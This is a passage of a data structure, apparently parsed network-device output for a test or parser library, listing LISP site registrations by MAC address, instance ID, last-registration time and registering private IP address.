"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.4940/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"a4b2.39ff.4944/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.4948/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.494c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.4954/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"a4b2.39ff.4958/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"a4b2.39ff.495c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.4960/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"a4b2.39ff.4968/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.496c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"a4b2.39ff.4970/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.4974/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"a4b2.39ff.4978/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.497c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"a4b2.39ff.4984/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"a4b2.39ff.4988/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.4994/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4998/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.49b0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.49d4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.49ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.49f0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.49f4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.4901/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.4a08/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8188,
},
"a4b2.39ff.4a10/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4a20/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4a28/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.4a2c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.4a30/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.4a34/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.4a54/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.4a5c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.4a74/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.4a78/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.4a7c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.4a80/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"a4b2.39ff.4a84/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.4a88/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.4a90/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.4a94/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.4a98/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.4a9c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.4aa8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.4aac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.4ab0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.4ab4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8188,
},
"a4b2.39ff.4abc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.4ac0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.4acc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.4ad0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.4ad4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.4ad8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.4adc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.4af4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.4afc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"a4b2.39ff.4a05/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4b0c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4b10/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.4b18/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.4b1c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.4b20/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"a4b2.39ff.4b28/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.4b2c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.4b30/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.4b3c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.4b44/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4b4c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.4b50/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.4b58/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8188,
},
"a4b2.39ff.4b5c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"a4b2.39ff.4b60/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.4b68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.4b78/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.4b7c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4b80/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.4b84/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4b98/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.4b9c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.4bac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.4bb0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8188,
},
"a4b2.39ff.4bb4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.4bc4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.4bd8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.4bdc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.5238/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.52b0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.52d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.52ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.52f4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.5318/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.532c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.5370/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.5384/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.56d0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.56e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.574c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.57a4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
}
},
},
8189: {
"lisp": 0,
"site_name": {
"site_uci": {
"any-mac": {
"last_register": "never",
"up": "no",
"who_last_registered": "--",
"inst_id": 8189,
},
"0000.0cff.94fb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8189,
},
"0000.0cff.94fd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8189,
},
"0001.2eff.ac9b/48": {
"last_register": "1d10h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8189,
},
"000c.29ff.90c1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8189,
},
"0016.25ff.5de1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8189,
},
"0016.25ff.62be/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8189,
},
"0016.25ff.63de/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8189,
},
"0016.25ff.68ef/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8189,
},
"0016.25ff.680a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8189,
},
"0016.25ff.6e2c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8189,
},
"0016.25ff.6e44/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8189,
},
"0016.25ff.6e45/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8189,
},
"0016.25ff.6e58/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8189,
},
"0016.25ff.6e59/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8189,
},
"0016.25ff.6e64/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8189,
},
"0016.25ff.6e75/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8189,
},
"0016.25ff.6e85/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8189,
},
"0016.25ff.6fea/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8189,
},
"0016.25ff.742e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8189,
},
"0016.25ff.743f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8189,
},
"0016.25ff.b93e/48": {
"last_register": "00:01:42",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8189,
},
"001f.29ff.b6df/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8189,
},
"0022.64ff.df2d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8189,
},
"0024.81ff.32ba/48": {
"last_register": "14:54:26",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8189,
},
"0025.64ff.fa82/48": {
"last_register": "19:19:47",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8189,
},
"0025.64ff.4716/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"00cc.fcff.a6f3/48": {
"last_register": "00:00:53",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8189,
},
"00e0.4cff.8bd7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8189,
},
"00e0.b4ff.da01/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8189,
},
"14da.e9ff.f734/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8189,
},
"1860.24ff.d2bd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8189,
},
"1c87.2cff.44b3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"1cc1.deff.5a00/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"30f7.0dff.66c0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"3417.ebff.27a8/48": {
"last_register": "19:20:04",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8189,
},
"3c07.54ff.315b/48": {
"last_register": "01:58:40",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8189,
},
"3c07.54ff.e75e/48": {
"last_register": "19:19:01",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8189,
},
"3c28.6dff.65ea/48": {
"last_register": "00:00:08",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8189,
},
"402c.f4ff.6577/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8189,
},
"4061.86ff.8e6d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8189,
},
"482a.e3ff.6c27/48": {
"last_register": "4d23h",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8189,
},
"4860.5fff.95ad/48": {
"last_register": "01:07:34",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8189,
},
"4ccc.6aff.622a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"58cb.52ff.f545/48": {
"last_register": "00:49:52",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8189,
},
"683b.78ff.c7ed/48": {
"last_register": "03:04:27",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8189,
},
"685b.35ff.b659/48": {
"last_register": "00:17:30",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8189,
},
"6c0b.84ff.2cca/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8189,
},
"6c0b.84ff.2fe6/48": {
"last_register": "04:14:31",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8189,
},
"6c0b.84ff.b83c/48": {
"last_register": "10:48:19",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8189,
},
"6c71.0dff.4a07/48": {
"last_register": "03:43:47",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8189,
},
"7020.84ff.7860/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8189,
},
"7020.84ff.78fe/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8189,
},
"7020.84ff.f237/48": {
"last_register": "23:55:52",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8189,
},
"7020.84ff.018f/48": {
"last_register": "21:55:20",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"705a.0fff.ac28/48": {
"last_register": "00:01:48",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8189,
},
"7085.c2ff.e523/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8189,
},
"70f3.95ff.81c2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8189,
},
"70f3.95ff.2be2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8189,
},
"70f3.95ff.f3e1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8189,
},
"7824.afff.be8a/48": {
"last_register": "00:07:17",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8189,
},
"78e7.d1ff.f128/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8189,
},
"8c8e.f2ff.cbb7/48": {
"last_register": "01:27:47",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8189,
},
"8e5d.1fff.b08a/48": {
"last_register": "00:02:56",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8189,
},
"9818.88ff.67e3/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8189,
},
"9818.88ff.67e6/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8189,
},
"9818.88ff.67ec/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8189,
},
"a0cc.2bff.f634/48": {
"last_register": "00:00:08",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8189,
},
"a4ae.11ff.6b3c/48": {
"last_register": "19:15:07",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8189,
},
"a4ae.11ff.6b3d/48": {
"last_register": "19:15:07",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8189,
},
"a4c3.f0ff.2571/48": {
"last_register": "01:25:41",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8189,
},
"a81e.84ff.54e0/48": {
"last_register": "02:44:44",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8189,
},
"a860.b6ff.448a/48": {
"last_register": "19:20:03",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8189,
},
"b827.ebff.2c06/48": {
"last_register": "00:00:46",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8189,
},
"b827.ebff.2fe0/48": {
"last_register": "00:00:57",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8189,
},
"b827.ebff.8759/48": {
"last_register": "00:10:33",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8189,
},
"bc16.65ff.66a2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8189,
},
"c8cb.b8ff.c63d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8189,
},
"d004.01ff.67f9/48": {
"last_register": "00:04:09",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8189,
},
"d485.64ff.529e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"dc4a.3eff.5d38/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"dca6.32ff.5e2c/48": {
"last_register": "00:03:08",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8189,
},
"dca6.32ff.fc60/48": {
"last_register": "00:01:59",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8189,
},
"dca6.32ff.2868/48": {
"last_register": "19:30:09",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8189,
},
"e04f.43ff.6443/48": {
"last_register": "00:16:34",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8189,
},
"e069.95ff.9fd8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8189,
},
"e0cb.4eff.466d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"e4e7.49ff.87df/48": {
"last_register": "00:29:31",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8189,
},
"e86a.64ff.4277/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8189,
},
"f493.9fff.ddd3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8189,
},
"f493.9fff.dddc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8189,
},
"fc4d.d4ff.9bcb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8189,
},
"fc4d.d4ff.103c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8189,
},
}
},
},
8190: {
"lisp": 0,
"site_name": {
"site_uci": {
"any-mac": {
"last_register": "never",
"up": "no",
"who_last_registered": "--",
"inst_id": 8190,
},
"000f.44ff.8b76/48": {
"last_register": "21:28:40",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8190,
},
"0010.83ff.54ab/48": {
"last_register": "4d23h",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8190,
},
"0018.feff.7f87/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"0019.17ff.73a7/48": {
"last_register": "5d08h",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"0019.17ff.6bc8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8190,
},
"0019.17ff.6bd1/48": {
"last_register": "1w5d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"0019.17ff.6b1d/48": {
"last_register": "5d09h",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8190,
},
"0019.17ff.6b2a/48": {
"last_register": "5d09h",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"0019.17ff.fb7f/48": {
"last_register": "6d08h",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8190,
},
"001f.c6ff.63b8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8190,
},
"0023.68ff.e685/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"0023.68ff.1a9d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8190,
},
"0023.68ff.4b9a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"0023.68ff.4ccf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
